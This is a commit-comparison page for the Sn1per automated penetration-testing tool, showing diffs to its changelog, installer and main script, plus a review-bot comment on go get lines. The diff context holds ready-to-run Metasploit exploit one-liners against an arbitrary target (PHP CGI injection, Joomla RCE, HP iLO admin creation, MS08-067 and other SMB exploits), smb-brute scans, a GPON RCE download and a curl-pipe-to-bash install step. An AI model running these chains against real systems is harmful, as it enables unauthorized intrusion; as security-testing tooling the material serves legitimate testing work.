Compare commits


7 Commits
v5.2 ... v5.4

Author SHA1 Message Date
1N3
84e3559a6f Merge pull request #172 from m0rv4i/master
Fix dnscan path and go dependencies
2018-08-10 08:15:30 -07:00
m0rv4i
ae375f70da Fix dnscan path and go dependencies 2018-08-10 12:55:00 +01:00
WP Engine Marketing
07dfa854ab Sn1per by 1N3@CrowdShield 2018-08-09 14:58:15 -07:00
WP Engine Marketing
d4f35abc7e Sn1per by 1N3@CrowdShield 2018-08-06 09:23:46 -07:00
WP Engine Marketing
b3ab9a0fba Sn1per by 1N3@CrowdShield 2018-08-04 14:23:38 -07:00
WP Engine Marketing
f24f966a29 Sn1per by 1N3@CrowdShield 2018-08-04 13:38:44 -07:00
WP Engine Marketing
c3861de996 Sn1per by 1N3@CrowdShield 2018-08-04 13:15:41 -07:00
3 changed files with 25 additions and 178 deletions


@@ -1,4 +1,8 @@
## CHANGELOG:
* v5.3 - Updated AMass repo in install.sh
* v5.3 - Removed CloudFail
* v5.3 - Fixed issue with subfinder missing brute force list
* v5.3 - Fixed issue with invalid dnsscan reference
* v5.2 - Added SubOver subdomain takeover scanner
* v5.2 - Added Subfinder subdomain enumeration tool
* v5.2 - Added Amass subdomain enumeration tool


@@ -21,9 +21,10 @@ echo ""
INSTALL_DIR=/usr/share/sniper
LOOT_DIR=/usr/share/sniper/loot
PLUGINS_DIR=/usr/share/sniper/plugins
GO_DIR=~/go/bin
echo -e "$OKGREEN + -- --=[This script will install sniper under $INSTALL_DIR. Are you sure you want to continue?$RESET"
read answer
read answer
mkdir -p $INSTALL_DIR 2> /dev/null
mkdir -p $LOOT_DIR 2> /dev/null
@@ -37,7 +38,7 @@ cp -Rf * $INSTALL_DIR 2> /dev/null
cd $INSTALL_DIR
echo -e "$OKORANGE + -- --=[Installing package dependencies...$RESET"
apt-get install nfs-common eyewitness nodejs wafw00f xdg-utils metagoofil clusterd ruby rubygems python dos2unix zenmap sslyze arachni aha libxml2-utils rpcbind uniscan xprobe2 cutycapt host whois dirb dnsrecon curl nmap php php-curl hydra iceweasel wpscan sqlmap nbtscan enum4linux cisco-torch metasploit-framework theharvester dnsenum nikto smtp-user-enum whatweb sslscan amap jq
apt-get install nfs-common eyewitness nodejs wafw00f xdg-utils metagoofil clusterd ruby rubygems python dos2unix zenmap sslyze arachni aha libxml2-utils rpcbind uniscan xprobe2 cutycapt host whois dirb dnsrecon curl nmap php php-curl hydra iceweasel wpscan sqlmap nbtscan enum4linux cisco-torch metasploit-framework theharvester dnsenum nikto smtp-user-enum whatweb sslscan amap jq golang
apt-get install waffit 2> /dev/null
pip install dnspython colorama tldextract urllib3 ipaddress requests
curl -o- https://raw.githubusercontent.com/creationix/nvm/v0.33.8/install.sh | bash
@@ -52,6 +53,7 @@ rm -Rf $PLUGINS_DIR 2> /dev/null
mkdir $PLUGINS_DIR 2> /dev/null
cd $PLUGINS_DIR
mkdir -p $PLUGINS_DIR/nmap_scripts/ 2> /dev/null
mkdir -p $GO_DIR
echo -e "$OKORANGE + -- --=[Downloading extensions...$RESET"
git clone https://github.com/1N3/Findsploit.git
@@ -68,19 +70,18 @@ git clone https://github.com/nccgroup/shocker.git
git clone --depth 1 https://github.com/drwetter/testssl.sh.git
git clone https://github.com/BishopFox/spoofcheck.git
git clone https://github.com/arthepsy/ssh-audit
git clone https://github.com/m0rtem/CloudFail.git
git clone https://github.com/deibit/cansina
git clone https://github.com/1N3/jexboss.git
git clone https://github.com/maurosoria/dirsearch.git
git clone https://github.com/jekyc/wig.git
git clone https://github.com/rbsec/dnscan.git
pip install -r $PLUGINS_DIR/dnscan/requirements.txt
pip3 install -r $PLUGINS_DIR/dnscan/requirements.txt
mv $INSTALL_DIR/bin/slurp.zip $PLUGINS_DIR
unzip slurp.zip
rm -f slurp.zip
cd ~/go/bin/;go get github.com/Ice3man543/SubOver; mv SubOver /usr/local/bin/subover
cd ~/go/bin;go get -u github.com/caffix/amass;mv amass /usr/local/bin/
cd ~/go/bin;go get github.com/subfinder/subfinder; mv subfinder /usr/local/bin/subfinder
cd ~/go/bin/;go get -u github.com/Ice3man543/SubOver; mv SubOver /usr/local/bin/subover
cd ~/go/bin;go get -u github.com/OWASP/Amass/cmd/amass; mv amass /usr/local/bin/
cd ~/go/bin;go get -u github.com/subfinder/subfinder; mv subfinder /usr/local/bin/subfinder
cd $PLUGINS_DIR
wget https://github.com/michenriksen/aquatone/blob/master/subdomains.lst -O /usr/share/sniper/plugins/Sublist3r/subdomains.lst
wget https://raw.githubusercontent.com/1N3/IntruderPayloads/master/FuzzLists/dirbuster-quick.txt -O /usr/share/sniper/plugins/cansina/dirbuster-quick.txt
@@ -89,7 +90,6 @@ wget https://raw.githubusercontent.com/xorrbit/nmap/865142904566e416944ebd6870d4
wget https://raw.githubusercontent.com/f3d0x0/GPON/master/gpon_rce.py -O /usr/share/sniper/bin/gpon_rce.py
cp $INSTALL_DIR/bin/iis-buffer-overflow.nse /usr/share/nmap/scripts/iis-buffer-overflow.nse 2> /dev/null
echo -e "$OKORANGE + -- --=[Setting up environment...$RESET"
cd $PLUGINS_DIR/CloudFail/ && apt-get install python3-pip && pip3 install -r requirements.txt
cd $PLUGINS_DIR/Findsploit/ && bash install.sh
cd $PLUGINS_DIR/BruteX/ && bash install.sh
cd $PLUGINS_DIR/spoofcheck/ && pip install -r requirements.txt
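Review bot: The three new `go get` lines in the hunk starting at `@@ -68,19 +70,18 @@` (SubOver, Amass, subfinder) hard-code `~/go/bin` even though this same commit introduces `GO_DIR=~/go/bin` and creates it with `mkdir -p $GO_DIR`, and the `cd`, `go get` and `mv` are chained with `;`, so a failed fetch still runs `mv` in whatever directory the shell ended up in. I'd use the variable and `&&`, e.g. `cd "$GO_DIR" && go get -u github.com/Ice3man543/SubOver && mv SubOver /usr/local/bin/subover`, and the same shape for the amass and subfinder lines. If `GOPATH` is set to anything other than `~/go`, the binaries are written elsewhere and the `mv` fails; `$(go env GOPATH)/bin` would follow the actual setting instead of assuming the default. Note also that `go get -u` fetches the current head of each third-party repository with no version pin or checksum, so what gets installed into `/usr/local/bin` depends on upstream state at install time — worth a comment on these lines if that is accepted, or a pinned checkout if reproducible installs matter.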

183
sniper

@@ -3,7 +3,7 @@
# + -- --=[http://xerosecurity.com
#
VER="5.2"
VER="5.3"
BROWSER="firefox" # SET DEFAULT BROWSER
INSTALL_DIR="/usr/share/sniper"
PLUGINS_DIR="$INSTALL_DIR/plugins"
@@ -626,69 +626,45 @@ if [ "$MODE" = "webporthttp" ]; then
fi
cd $INSTALL_DIR
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
clusterd -i $TARGET -p $PORT
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; run; use scanner/http/webdav_website_content; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL false; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING MS15-034 SYS MEMORY DUMP METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS \"$TARGET\"; set RPORT 80; set WAIT 2; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use exploit/windows/http/badblue_passthru; setg RHOST \"$TARGET\"; set RPORT 80; run; back;exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST \"$TARGET\"; set RPORT 80; run; back;exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST \"$TARGET\"; set RPORT 80; set SSL false; run; back;exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOIT $RESET"
@@ -887,21 +863,11 @@ if [ "$MODE" = "webporthttps" ]; then
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
wget https://$TARGET:$PORT/robots.txt -O $LOOT_DIR/web/robots-$TARGET:$PORT-https.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
clusterd --ssl -i $TARGET -p $PORT
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
@@ -923,77 +889,46 @@ if [ "$MODE" = "webporthttps" ]; then
fi
cd $INSTALL_DIR
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL true; run; use scanner/http/webdav_website_content; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE TOMCAT UTF8 TRAVERSAL EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use admin/http/tomcat_utf8_traversal; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING MS15-034 SYS MEMORY DUMP METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS \"$TARGET\"; set RPORT "$PORT"; set SSL true; set WAIT 2; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use exploit/windows/http/badblue_passthru; setg RHOST \"$TARGET\"; set RPORT "$PORT"; set SSL true; run; back; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST \"$TARGET\"; set RPORT "$PORT"; set SSL true; run; back; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST \"$TARGET\"; set RPORT "$PORT"; set SSL true; run; back; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
@@ -1167,14 +1102,14 @@ if [ "$MODE" = "stealth" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
whois $TARGET
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING DNS SUBDOMAINS $RESET"
echo -e "$OKRED GATHERING DNS SUBDOMAINS VIA SUBLIST3R $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
if [ "$SUBLIST3R" = "1" ]; then
python $PLUGINS_DIR/Sublist3r/sublist3r.py -d $TARGET -vvv -o $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
fi
if [ "$AMASS" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING DNS SUBDOMAINS $RESET"
echo -e "$OKRED GATHERING DNS SUBDOMAINS VIA AMASS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
amass -whois -ip -brute -o $LOOT_DIR/domains/domains-$TARGET-amass.txt -min-for-recursive 3 -d $TARGET 2>/dev/null
cut -d, -f1 $LOOT_DIR/domains/domains-$TARGET-amass.txt | grep $TARGET > $LOOT_DIR/domains/domains-$TARGET-amass-sorted.txt
@@ -1182,15 +1117,15 @@ if [ "$MODE" = "stealth" ]; then
fi
if [ "$SUBFINDER" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING DNS SUBDOMAINS $RESET"
echo -e "$OKRED GATHERING DNS SUBDOMAINS VIA SUBFINDER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
subfinder -o $LOOT_DIR/domains/domains-$TARGET-subfinder.txt -b -d $TARGET 2>/dev/null
subfinder -o $LOOT_DIR/domains/domains-$TARGET-subfinder.txt -b -w $DOMAINS_DEFAULT -d $TARGET 2>/dev/null
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED BRUTE FORCING DNS SUBDOMAINS $RESET"
echo -e "$OKRED BRUTE FORCING DNS SUBDOMAINS VIA DNSCAN (THIS COULD TAKE A WHILE...) $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
if [ "$DNSCAN" = "1" ]; then
python /pentest/recon/dnscan/dnscan.py -d $TARGET -w $DOMAINS_FULL -o $LOOT_DIR/domains/domains-dnscan-$TARGET.txt -i $LOOT_DIR/domains/domains-ips-$TARGET.txt
python3 $PLUGINS_DIR/dnscan/dnscan.py -d $TARGET -w $DOMAINS_FULL -o $LOOT_DIR/domains/domains-dnscan-$TARGET.txt -i $LOOT_DIR/domains/domains-ips-$TARGET.txt
cat $LOOT_DIR/domains/domains-dnscan-$TARGET.txt | grep $TARGET| awk '{print $3}' | sort -u >> $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null
dos2unix $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
fi
@@ -1661,12 +1596,12 @@ if [ "$RECON" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
whois $TARGET
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING DNS SUBDOMAINS $RESET"
echo -e "$OKRED GATHERING DNS SUBDOMAINS VIA SUBLIST3R $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $PLUGINS_DIR/Sublist3r/sublist3r.py -d $TARGET -vvv -o $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
if [ "$AMASS" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING DNS SUBDOMAINS $RESET"
echo -e "$OKRED GATHERING DNS SUBDOMAINS VIA AMASS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
amass -whois -ip -brute -o $LOOT_DIR/domains/domains-$TARGET-amass.txt -min-for-recursive 3 -d $TARGET 2>/dev/null
cut -d, -f1 $LOOT_DIR/domains/domains-$TARGET-amass.txt | grep $TARGET > $LOOT_DIR/domains/domains-$TARGET-amass-sorted.txt
@@ -1675,15 +1610,15 @@ if [ "$RECON" = "1" ]; then
if [ "$SUBFINDER" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING DNS SUBDOMAINS $RESET"
echo -e "$OKRED GATHERING DNS SUBDOMAINS VIA SUBFINDER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
subfinder -o $LOOT_DIR/domains/domains-$TARGET-subfinder.txt -b -d $TARGET 2>/dev/null
subfinder -o $LOOT_DIR/domains/domains-$TARGET-subfinder.txt -b -w $DOMAINS_DEFAULT -d $TARGET 2>/dev/null
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED BRUTE FORCING DNS SUBDOMAINS $RESET"
echo -e "$OKRED BRUTE FORCING DNS SUBDOMAINS VIA DNSCAN (THIS COULD TAKE A WHILE...) $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
if [ "$DNSCAN" = "1" ]; then
python /pentest/recon/dnscan/dnscan.py -d $TARGET -w $DOMAINS_FULL -o $LOOT_DIR/domains/domains-dnscan-$TARGET.txt -i $LOOT_DIR/domains/domains-$TARGET-ips.txt
python3 $PLUGINS_DIR/dnscan/dnscan.py -d $TARGET -w $DOMAINS_FULL -o $LOOT_DIR/domains/domains-dnscan-$TARGET.txt -i $LOOT_DIR/domains/domains-$TARGET-ips.txt
cat $LOOT_DIR/domains/domains-dnscan-$TARGET.txt | grep $TARGET | awk '{print $3}' | sort -u >> $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null
dos2unix $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
fi
@@ -1986,10 +1921,6 @@ else
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
clusterd -i $TARGET
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
@@ -2010,75 +1941,39 @@ else
echo -e "${OKGREEN}====================================================================================${RESET}"
nikto -h http://$TARGET -output $LOOT_DIR/web/nikto-$TARGET-http.txt
fi
cd $INSTALL_DIR
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "80"; setg SSL false; run; use scanner/http/webdav_website_content; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE TOMCAT UTF8 TRAVERSAL EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use admin/http/tomcat_utf8_traversal; setg RHOSTS "$TARGET"; setg RPORT "80"; set SSL false; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "80"; set SSL false; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "80"; set SSL false; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING MS15-034 SYS MEMORY DUMP METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS \"$TARGET\"; set RPORT 80; set WAIT 2; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use exploit/windows/http/badblue_passthru; setg RHOST \"$TARGET\"; set RPORT 80; run; back;exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST \"$TARGET\"; set RPORT 80; run; back;exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST \"$TARGET\"; set RPORT 80; set SSL false; run; back;exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
@@ -2294,10 +2189,6 @@ else
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
clusterd --ssl -i $TARGET
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
@@ -2318,79 +2209,38 @@ else
nikto -h https://$TARGET -output $LOOT_DIR/web/nikto-$TARGET-https.txt
fi
cd $INSTALL_DIR
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "443"; setg SSL true; run; use scanner/http/webdav_website_content; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE TOMCAT UTF8 TRAVERSAL EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use admin/http/tomcat_utf8_traversal; setg RHOSTS "$TARGET"; setg RPORT "443"; set SSL true; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "443"; set SSL true; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING MS15-034 SYS MEMORY DUMP METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS \"$TARGET\"; set RPORT 443; set SSL true; set WAIT 2; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use exploit/windows/http/badblue_passthru; setg RHOST \"$TARGET\"; set RPORT 443; set SSL true; run; back;exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST \"$TARGET\"; set RPORT 443; set SSL true; run; back;exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST \"$TARGET\"; set RPORT 443; set SSL true; run; back;exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
@@ -2464,13 +2314,6 @@ else
python $SAMRDUMP $TARGET
nbtscan $TARGET
nmap -A -sV -Pn -T5 -p445 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smb-protocols --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET
msfconsole -x "setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; use auxiliary/scanner/smb/smb_version; run; use auxiliary/scanner/smb/pipe_auditor; run; use auxiliary/scanner/smb/pipe_dcerpc_auditor; run; use auxiliary/scanner/smb/psexec_loggedin_users; run; use auxiliary/scanner/smb/smb2; run; use auxiliary/scanner/smb/smb_enum_gpp; run; use auxiliary/scanner/smb/smb_enumshares; run; use auxiliary/scanner/smb/smb_enumusers; run; use auxiliary/scanner/smb/smb_enumusers_domain; run; use auxiliary/scanner/smb/smb_login; run; use auxiliary/scanner/smb/smb_lookupsid; run; use auxiliary/scanner/smb/smb_uninit_cred; run; use auxiliary/scanner/smb/smb_version; run; use exploit/linux/samba/chain_reply; run; use windows/smb/ms08_067_netapi; run; use exploit/windows/smb/ms06_040_netapi; run; use exploit/windows/smb/ms05_039_pnp; run; use exploit/windows/smb/ms10_061_spoolss; run; use exploit/windows/smb/ms09_050_smb2_negotiate_func_index; run; use auxiliary/scanner/smb/smb_enum_gpp; run; use auxiliary/scanner/smb/smb_ms17_010; run; exit;"
fi